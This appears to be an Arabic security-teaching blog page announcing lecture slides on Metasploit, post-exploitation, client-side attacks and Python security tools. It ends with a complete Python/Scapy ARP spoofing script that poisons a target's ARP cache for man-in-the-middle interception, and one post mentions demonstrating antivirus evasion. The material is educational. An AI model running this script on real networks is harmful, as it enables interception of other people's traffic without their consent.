Writing Basic Security Tools using Python

السلام عليكم ورحمة الله وبركاته

مضت فترة طويلة من الزمن لم أكتب فيها أي شيء هنا، واليوم تذكرت بعد حديثي مع أحد الأخوة الأعزاء موضوع نشر المحاضرة التي عملتها فيما يخص إستعمال لغة البرمجة Python للمجالات الأمنية. أعلم بإنها لربما ليست أفضل محاظرة حول الموضوع، وربما فاتني الكثير ولكن هذا ما أستطعت تغطيته في ثلاث ساعات تقريباً (أحيانا أخذت أكثر من ذلك بقليل). المحاضرة الحالية تم التعديل على ما كنت أقوم به سابقاً، بعد أن أطلعت على محاضرة ألقاها في مؤتمر BSides، عام 2012 تحت عنوان: Overview of Python – Bsides Detroit 2012

Thank you Keith for sharing your work which was the inspiration of mine.

Continue reading

الجزء السابع من محاضرات HTID

نسيت أقم بوضع هذا الإعلان بصراحة … ربما لإنشغالي بالإمتحانات النهائية لهذا الفصل الدراسي … على كل حال، هذا الجزء كان عن ميتاسبلويت Metasploit Framework … حاولت قدر الإمكان أن أوضح جميع التفاصيل الخاصة في الأداة … ما لم يسعفني هو الوقت دائماً … ولهذا كانت فقط 40 صفحة تقريباً … لكن ما قمت به هو عمل Demo لكثير من الأمور، من ظمنها تجاوز AV محدث بآخر تحديث وكذلك عن Post Exploitation وأيضاً عن عملية البحث داخل الشبكة عن أجهزة آخرى وإستغلالها … وهذا كله بدون شك لم أنسى عملية الـ Forensics من خلال الأداة …

على كل حال المادة تجدوها هنا … أتمنى تعجبكم وتكون مفيدة لكم …

بالتوفيق …

الجزء السادس من محاضرات HTID

هذا هو الجزء السادس من محاضرة الأسبوع الماضي، والذي كان حول Post Exploitation سواءاً Linux أو Windows … هذا كان الجانب النظري … الجانب العملي سيتم سيتم إنهائه يوم الثلاثاء القادم إن شاء الله … حيث ستكون مع محاضرة الـ Metasploit التي أضطررنا الى تأجيلها للثلاثاء (محاضرة إضافية) بسبب مناقشة أعمال الطلبة … المحاضرة أعطت فكرة عن العديد من الزوايا الخاصة بالـ Post Exploitation وأين تقوم بالبحث عن المعلومات وما هي المعلومات المهمة التي يجب البحث عنها الى آخره من الأمور … أتمنى أن تكون مفيدة لكم …

تجدونها في صفحة المحاضرات هنا

الجزء الخامس من محاضرات HTID

هذا هو الجزء الخامس الذي كان محاضرة الأسبوع الماضي … المحاضرة عن Client-Side Attacks … المحاضرة أعطت فكرة عن العديد من الزوايا الخاصة بالـ Client-Side Attacks وكذلك تحدثت فيها عن تحليل ملفات الـ PDF وبإستعمال أدوات Dider Stevens … أتمنى أن تكون مفيدة لكم …

سأقوم بإضافتهم الى صفحة المحاضرات قريباً … على كل حال جميع المحاضرات تجدونها هنا

سكربت بسيط لعمل ARP Spoofing

سكربت بسيط لعمل ARP Spoofing … قم بنسخ الكود وتشغيله او تحميله من صفحة المشاريع (هنا) …

#!/usr/bin/env python
import sys, time
from scapy.all import sendp, ARP, Ether

if len (sys.argv) < 4:
	print "Usage\n:"
	print sys.argv[0] + "   "
	print "./arpSpoofer.py eth0 192.168.1.56 192.168.1.100"	
	sys.exit (1)

networkInterface = str(sys.argv[1])
targetIPAddr = sys.argv[2]
spoofedIPAddr = sys.argv[3]

# Assembling the Spoofed Packet
spoofedPacket = Ether() / ARP(pdst=targetIPAddr, psrc=spoofedIPAddr, op="is-at")

# Start Spoofing (aka Poisoning) :)
while True:
	sendp(spoofedPacket, iface=networkInterface)
	time.sleep (1)

المزيد من التجارب في الطريق إن شاء الله :)

Pages: 1 2 3 4 5 6 7 8 9 10 Next